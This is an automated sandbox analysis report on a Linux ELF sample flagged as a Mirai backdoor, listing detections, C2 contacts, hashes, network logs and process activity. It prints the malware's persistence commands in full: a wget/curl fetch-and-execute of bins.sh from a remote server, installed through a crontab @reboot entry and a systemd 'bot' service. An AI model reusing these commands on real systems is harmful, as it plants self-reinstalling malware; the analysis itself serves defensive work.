sh sh 30->39         started        41 2 other processes 30->41 signatures11 process12 signatures13 51 Executes the "crontab" command typically for achieving persistence 34->51

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
x86_64.elf37%ReversingLabsLinux.Backdoor.Mirai
x86_64.elf100%AviraEXP/ELF.Mirai.W
x86_64.elf100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
daisy.ubuntu.com
162.213.35.24
truefalse
    high
    host.zopz-api.com
    172.111.38.48
    truefalse
      high
      NameSourceMaliciousAntivirus DetectionReputation
      http://serverip/bins/bins.shtmp.KcMIgX.22.drfalse
        high
        http://serverip/bins/bins.sh;bot.service.13.drfalse
          high
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          172.111.38.48
          host.zopz-api.comReserved
          54540INCERO-HVVCUSfalse
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          172.111.38.48mipsel.elfGet hashmaliciousUnknownBrowse
            i686.elfGet hashmaliciousUnknownBrowse
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              daisy.ubuntu.comkjsusa6.elfGet hashmaliciousMiraiBrowse
              • 162.213.35.25
              mmb9.elfGet hashmaliciousMirai, OkiruBrowse
              • 162.213.35.24
              mmb2.elfGet hashmaliciousMirai, OkiruBrowse
              • 162.213.35.25
              mmb1.elfGet hashmaliciousMirai, OkiruBrowse
              • 162.213.35.24
              owari.m68k.elfGet hashmaliciousUnknownBrowse
              • 162.213.35.25
              owari.arm6.elfGet hashmaliciousUnknownBrowse
              • 162.213.35.25
              owari.arm7.elfGet hashmaliciousMiraiBrowse
              • 162.213.35.24
              owari.mips.elfGet hashmaliciousUnknownBrowse
              • 162.213.35.24
              host.zopz-api.commipsel.elfGet hashmaliciousUnknownBrowse
              • 172.111.38.48
              i686.elfGet hashmaliciousUnknownBrowse
              • 172.111.38.48
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              INCERO-HVVCUSmipsel.elfGet hashmaliciousUnknownBrowse
              • 172.111.38.48
              i686.elfGet hashmaliciousUnknownBrowse
              • 172.111.38.48
              cIhVfU4Bus.elfGet hashmaliciousMiraiBrowse
              • 172.110.25.149
              b2bXo6vmDm.exeGet hashmaliciousSystemBCBrowse
              • 23.29.124.10
              https://auth-start-treizor.github.io/Get hashmaliciousUnknownBrowse
              • 23.227.176.186
              https://ambassadorlimo.comGet hashmaliciousUnknownBrowse
              • 198.99.138.98
              https://ambassadorlimo.com/Get hashmaliciousUnknownBrowse
              • 198.99.138.98
              https://link.edgepilot.com/s/58d339fb/mi_L0_elk0K48SZfFk6Q5A?u=http://www.ambassadorlimo.com/Get hashmaliciousUnknownBrowse
              • 198.99.138.98
              http://www.philmauer.com/Get hashmaliciousUnknownBrowse
              • 172.111.52.90
              http://loveevamk.lifeGet hashmaliciousUnknownBrowse
              • 172.111.38.73
              No context
              No context
              Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
              File Type:ASCII text
              Category:dropped
              Size (bytes):76
              Entropy (8bit):3.7627880354948586
              Encrypted:false
              SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
              MD5:D86A1F5765F37989EB0EC3837AD13ECC
              SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
              SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
              SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
              Process:/tmp/x86_64.elf
              File Type:ASCII text
              Category:dropped
              Size (bytes):178
              Entropy (8bit):4.358630015292201
              Encrypted:false
              SSDEEP:3:C7exTAXWTHYMOduLWiHSH7zFUbKEVQRFQ4AXWTHYMOduLWiHc:yeGsHPirvFNBjwsHPiL
              MD5:C3685F292213652676F734AB36C060EE
              SHA1:1D05F7F6302EC60E7990DE4BBE9180C149EFC731
              SHA-256:D070C429D850B4BAAED03330B6F96C7473ED86D0D33A2FACCD11FB3325767C4C
              SHA-512:7AC7D9594C8A4F0160FF9AAE92F7A1EFDFDB933EE3006DCCAC910C79F6FC529AF07B8DF9DAD16E8C21EC3DEF5C5AB9168E4994AE87EDE23E7D4A20F2E7178295
              Malicious:true
              Reputation:moderate, very likely benign file
              Preview:./bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh".
              Process:/tmp/x86_64.elf
              File Type:ASCII text
              Category:dropped
              Size (bytes):356
              Entropy (8bit):4.9110117370593995
              Encrypted:false
              SSDEEP:6:z872KstRZAMg8uko4dj2+feGsHPirvFNBjwsHPiFLnLQmWA4Rv:zE2ltRZAXsQ+GGmPirvFNBjwmPipLHW7
              MD5:F03C70CD4C61A1852F9E19B8FB0D639C
              SHA1:A6C078FFFFDF05C4C47B273B24E6B3FF4EF7E008
              SHA-256:AE50A3052A395987A2779DEB9253D4AA8638F2F8B1CDA7DF9039388F21BE7A90
              SHA-512:6277FBBFFCDD72FC3712721525538AC07FC46D290EBB02BE34CEF52B3E62BFA8A66F4E834D364D220108C815192E391AD986F05662FCBFAE674417507F4BCC20
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview:[Unit].Description=My Miscellaneous Service.After=network.target..[Service].Type=simple.User=root.WorkingDirectory=/tmp.ExecStart=/bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh".Restart=no..[Install].WantedBy=multi-user.target.
              Process:/usr/bin/crontab
              File Type:ASCII text
              Category:dropped
              Size (bytes):235
              Entropy (8bit):5.110514566077741
              Encrypted:false
              SSDEEP:6:SUrpqoqQjEOP1KmREJOBFQLvcqZHGMQ5UYLtCFt3HY8jsHB:8QjHig8YOeHLUHY8mB
              MD5:4ABA589E3234B39E0C93F2756E7E55E5
              SHA1:4077C0810EEB975B24A7F8DCC6DE45BE7A018CB8
              SHA-256:F087B07732BA7E42CFD24CC152AA6DB7CFD1DF8BC97914EE1CE6C1413D4C6028
              SHA-512:399D2A19B967AFE0F66EE1C4F6BBC4141E0E637D1AA9EA911931D1B67665337C908AF13755F12E0A54A83574BDA6E5361C55E09230CC44524AA62D76786FC29F
              Malicious:true
              Reputation:low
              Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Tue Nov 19 18:01:26 2024).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@reboot /bin/bash -c /bin/wget http://serverip/bins/bins.sh.
              File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
              Entropy (8bit):6.352181282803042
              TrID:
              • ELF Executable and Linkable format (generic) (4004/1) 100.00%
              File name:x86_64.elf
              File size:71'656 bytes
              MD5:c060aa8e1d7eeef5b50c97c829f479ff
              SHA1:3f5bd2cac04b460b9c2d0c07c7d6d95475daaf17
              SHA256:934af9b9bf9838d64d44911f92190a6742d152a421ed1a74762fb41b93f7366d
              SHA512:f41aaf9a8dca6c5e3e0163bcffd9ad9f46f5e3d390a55ac602dc36fd374eda903263ac7ca539289a23027a0bed91e91ac5f8746e75ac7f0294c920af07f0171d
              SSDEEP:1536:FqqTBlmF1tmpq7yP7/rDaTP5Tg435EVzD0zuKNTO7r1hlvw86AQ:FVLmFzCiyP7/PaTxvpEVzDzKNTOdhlva
              TLSH:7E633B0379428ABFC04BD2F447FB6939AD62B97E0936B2A877E4FE911A45DD02D1C710
              File Content Preview:.ELF..............>.......@.....@...................@.8...@.......................@.......@...............................................Q.......Q..............p..............Q.td....................................................H...._........H........

              ELF header

              Class:ELF64
              Data:2's complement, little endian
              Version:1 (current)
              Machine:Advanced Micro Devices X86-64
              Version Number:0x1
              Type:EXEC (Executable file)
              OS/ABI:UNIX - System V
              ABI Version:0
              Entry Point Address:0x400194
              Flags:0x0
              ELF Header Size:64
              Program Header Offset:64
              Program Header Size:56
              Number of Program Headers:3
              Section Header Offset:70824
              Section Header Size:64
              Number of Section Headers:13
              Header String Table Index:12
              NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
              NULL0x00x00x00x00x0000
              .initPROGBITS0x4000e80xe80x130x00x6AX001
              .textPROGBITS0x4001000x1000xe5460x00x6AX0016
              .finiPROGBITS0x40e6460xe6460xe0x00x6AX001
              .rodataPROGBITS0x40e6600xe6600x1c530x00x2A0032
              .eh_framePROGBITS0x4102b40x102b40x40x00x2A004
              .ctorsPROGBITS0x5102b80x102b80x100x00x3WA008
              .dtorsPROGBITS0x5102c80x102c80x100x00x3WA008
              .jcrPROGBITS0x5102d80x102d80x80x00x3WA008
              .dataPROGBITS0x5102e00x102e00x4a00x00x3WA0032
              .bssNOBITS0x5107800x107800x6b480x00x3WA0032
              .commentPROGBITS0x00x107800xccc0x00x0001
              .shstrtabSTRTAB0x00x1144c0x560x00x0001
              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
              LOAD0x00x4000000x4000000x102b80x102b86.38970x5R E0x100000.init .text .fini .rodata .eh_frame
              LOAD0x102b80x5102b80x5102b80x4c80x70102.44960x6RW 0x100000.ctors .dtors .jcr .data .bss
              GNU_STACK0x00x00x00x00x00.00000x6RW 0x8
              TimestampSource PortDest PortSource IPDest IP
              Nov 20, 2024 01:01:26.988228083 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:01:26.993136883 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:01:26.993199110 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:01:26.995261908 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:01:27.000164032 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:01:27.448900938 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:01:27.448976994 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:01:27.582982063 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:01:27.583077908 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:01:27.583142996 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:01:27.587997913 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:01:31.678312063 CET3480253192.168.2.138.8.8.8
              Nov 20, 2024 01:01:31.683294058 CET53348028.8.8.8192.168.2.13
              Nov 20, 2024 01:01:31.683466911 CET3480253192.168.2.138.8.8.8
              Nov 20, 2024 01:01:31.683466911 CET3480253192.168.2.138.8.8.8
              Nov 20, 2024 01:01:31.683490038 CET3480253192.168.2.138.8.8.8
              Nov 20, 2024 01:01:31.688945055 CET53348028.8.8.8192.168.2.13
              Nov 20, 2024 01:01:31.688957930 CET53348028.8.8.8192.168.2.13
              Nov 20, 2024 01:01:32.128591061 CET53348028.8.8.8192.168.2.13
              Nov 20, 2024 01:01:32.128810883 CET3480253192.168.2.138.8.8.8
              Nov 20, 2024 01:01:32.448960066 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:01:32.449012995 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:01:32.449090004 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:01:32.453898907 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:01:32.453963041 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:01:32.458796978 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:01:34.836941004 CET53348028.8.8.8192.168.2.13
              Nov 20, 2024 01:01:34.837116957 CET3480253192.168.2.138.8.8.8
              Nov 20, 2024 01:01:34.837165117 CET53348028.8.8.8192.168.2.13
              Nov 20, 2024 01:01:34.837241888 CET3480253192.168.2.138.8.8.8
              Nov 20, 2024 01:01:34.837316036 CET53348028.8.8.8192.168.2.13
              Nov 20, 2024 01:01:34.837378979 CET3480253192.168.2.138.8.8.8
              Nov 20, 2024 01:01:34.841913939 CET53348028.8.8.8192.168.2.13
              Nov 20, 2024 01:01:37.450094938 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:01:37.450174093 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:01:37.450174093 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:01:37.455066919 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:01:37.455113888 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:01:37.459912062 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:01:42.451054096 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:01:42.451124907 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:01:42.456079006 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:01:42.456160069 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:01:42.461122036 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:01:47.451997042 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:01:47.452078104 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:01:47.456918001 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:01:47.456964016 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:01:47.461805105 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:01:52.453388929 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:01:52.453473091 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:01:52.458398104 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:01:52.458436012 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:01:52.463385105 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:01:57.454221010 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:01:57.454325914 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:01:57.459265947 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:01:57.459319115 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:01:57.464322090 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:02:02.455215931 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:02:02.455334902 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:02:02.460261106 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:02:02.460400105 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:02:02.465271950 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:02:07.455893993 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:02:07.456032991 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:02:07.460948944 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:02:07.460994005 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:02:07.465822935 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:02:12.456903934 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:02:12.457130909 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:02:12.462033987 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:02:12.462106943 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:02:12.466963053 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:02:17.457513094 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:02:17.457627058 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:02:17.462873936 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:02:17.462939024 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:02:17.467844963 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:02:22.509509087 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:02:22.509654999 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:02:22.516195059 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:02:22.516256094 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:02:22.521089077 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:02:27.458709002 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:02:27.458834887 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:02:27.463758945 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:02:27.463924885 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:02:27.468776941 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:02:32.528846979 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:02:32.528997898 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:02:32.533878088 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:02:32.533952951 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:02:32.538779974 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:02:37.460547924 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:02:37.460637093 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:02:37.465513945 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:02:37.465708971 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:02:37.470539093 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:02:42.460819960 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:02:42.461036921 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:02:42.465872049 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:02:42.466047049 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:02:42.470896006 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:02:47.460689068 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:02:47.461060047 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:02:47.465967894 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:02:47.466046095 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:02:47.470980883 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:02:52.461606979 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:02:52.461880922 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:02:52.467652082 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:02:52.467732906 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:02:52.472647905 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:02:57.462634087 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:02:57.462754011 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:02:57.471070051 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:02:57.471124887 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:02:57.479382038 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:03:02.463119984 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:03:02.463238001 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:03:02.468240976 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:03:02.468650103 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:03:02.473582029 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:03:07.463952065 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:03:07.464178085 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:03:07.477386951 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:03:07.477468967 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:03:07.482542992 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:03:12.465053082 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:03:12.465159893 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:03:12.469974041 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:03:12.470052004 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:03:12.474874020 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:03:17.465378046 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:03:17.465446949 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:03:17.470313072 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:03:17.470366001 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:03:17.475260973 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:03:22.465924978 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:03:22.466109037 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:03:22.470999002 CET129052424172.111.38.48192.168.2.13
              Nov 20, 2024 01:03:22.471066952 CET524241290192.168.2.13172.111.38.48
              Nov 20, 2024 01:03:22.475872993 CET129052424172.111.38.48192.168.2.13
              TimestampSource PortDest PortSource IPDest IP
              Nov 20, 2024 01:01:26.952794075 CET5451053192.168.2.131.1.1.1
              Nov 20, 2024 01:01:26.986326933 CET53545101.1.1.1192.168.2.13
              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Nov 20, 2024 01:01:26.952794075 CET192.168.2.131.1.1.10x8eb7Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
              Nov 20, 2024 01:01:31.683466911 CET192.168.2.138.8.8.80xbd0eStandard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
              Nov 20, 2024 01:01:31.683490038 CET192.168.2.138.8.8.80x5e70Standard query (0)daisy.ubuntu.com28IN (0x0001)false
              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Nov 20, 2024 01:01:26.986326933 CET1.1.1.1192.168.2.130x8eb7No error (0)host.zopz-api.com172.111.38.48A (IP address)IN (0x0001)false
              Nov 20, 2024 01:01:32.128591061 CET8.8.8.8192.168.2.130xbd0eNo error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
              Nov 20, 2024 01:01:32.128591061 CET8.8.8.8192.168.2.130xbd0eNo error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false

              System Behavior

              Start time (UTC):00:01:21
              Start date (UTC):20/11/2024
              Path:/tmp/x86_64.elf
              Arguments:/tmp/x86_64.elf
              File size:71656 bytes
              MD5 hash:c060aa8e1d7eeef5b50c97c829f479ff

              Start time (UTC):00:01:21
              Start date (UTC):20/11/2024
              Path:/tmp/x86_64.elf
              Arguments:-
              File size:71656 bytes
              MD5 hash:c060aa8e1d7eeef5b50c97c829f479ff

              Start time (UTC):00:01:21
              Start date (UTC):20/11/2024
              Path:/tmp/x86_64.elf
              Arguments:-
              File size:71656 bytes
              MD5 hash:c060aa8e1d7eeef5b50c97c829f479ff

              Start time (UTC):00:01:26
              Start date (UTC):20/11/2024
              Path:/tmp/x86_64.elf
              Arguments:-
              File size:71656 bytes
              MD5 hash:c060aa8e1d7eeef5b50c97c829f479ff

              Start time (UTC):00:01:26
              Start date (UTC):20/11/2024
              Path:/tmp/x86_64.elf
              Arguments:-
              File size:71656 bytes
              MD5 hash:c060aa8e1d7eeef5b50c97c829f479ff

              Start time (UTC):00:01:26
              Start date (UTC):20/11/2024
              Path:/tmp/x86_64.elf
              Arguments:-
              File size:71656 bytes
              MD5 hash:c060aa8e1d7eeef5b50c97c829f479ff

              Start time (UTC):00:01:26
              Start date (UTC):20/11/2024
              Path:/bin/sh
              Arguments:sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):00:01:26
              Start date (UTC):20/11/2024
              Path:/bin/sh
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):00:01:26
              Start date (UTC):20/11/2024
              Path:/bin/sh
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):00:01:26
              Start date (UTC):20/11/2024
              Path:/usr/bin/crontab
              Arguments:crontab -l
              File size:43720 bytes
              MD5 hash:66e521d421ac9b407699061bf21806f5

              Start time (UTC):00:01:26
              Start date (UTC):20/11/2024
              Path:/bin/sh
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):00:01:26
              Start date (UTC):20/11/2024
              Path:/usr/bin/chmod
              Arguments:chmod +x bins.sh
              File size:63864 bytes
              MD5 hash:739483b900c045ae1374d6f53a86a279

              Start time (UTC):00:01:27
              Start date (UTC):20/11/2024
              Path:/bin/sh
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):00:01:27
              Start date (UTC):20/11/2024
              Path:/usr/bin/sh
              Arguments:sh bins.sh
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):00:01:27
              Start date (UTC):20/11/2024
              Path:/bin/sh
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):00:01:27
              Start date (UTC):20/11/2024
              Path:/bin/curl
              Arguments:/bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh
              File size:239848 bytes
              MD5 hash:add6bc2195e82c55985ccf49fd4048e6

              Start time (UTC):00:01:29
              Start date (UTC):20/11/2024
              Path:/bin/sh
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):00:01:29
              Start date (UTC):20/11/2024
              Path:/usr/bin/chmod
              Arguments:chmod +x bins.sh
              File size:63864 bytes
              MD5 hash:739483b900c045ae1374d6f53a86a279

              Start time (UTC):00:01:29
              Start date (UTC):20/11/2024
              Path:/usr/bin/sh
              Arguments:sh bins.sh
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):00:01:26
              Start date (UTC):20/11/2024
              Path:/bin/sh
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):00:01:26
              Start date (UTC):20/11/2024
              Path:/usr/bin/crontab
              Arguments:crontab -
              File size:43720 bytes
              MD5 hash:66e521d421ac9b407699061bf21806f5

              Start time (UTC):00:01:29
              Start date (UTC):20/11/2024
              Path:/tmp/x86_64.elf
              Arguments:-
              File size:71656 bytes
              MD5 hash:c060aa8e1d7eeef5b50c97c829f479ff

              Start time (UTC):00:01:29
              Start date (UTC):20/11/2024
              Path:/bin/sh
              Arguments:sh -c "/bin/systemctl enable bot"
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):00:01:29
              Start date (UTC):20/11/2024
              Path:/bin/sh
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):00:01:29
              Start date (UTC):20/11/2024
              Path:/bin/systemctl
              Arguments:/bin/systemctl enable bot
              File size:996584 bytes
              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

              Start time (UTC):00:01:29
              Start date (UTC):20/11/2024
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):00:01:29
              Start date (UTC):20/11/2024
              Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
              Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
              File size:22760 bytes
              MD5 hash:3633b075f40283ec938a2a6a89671b0e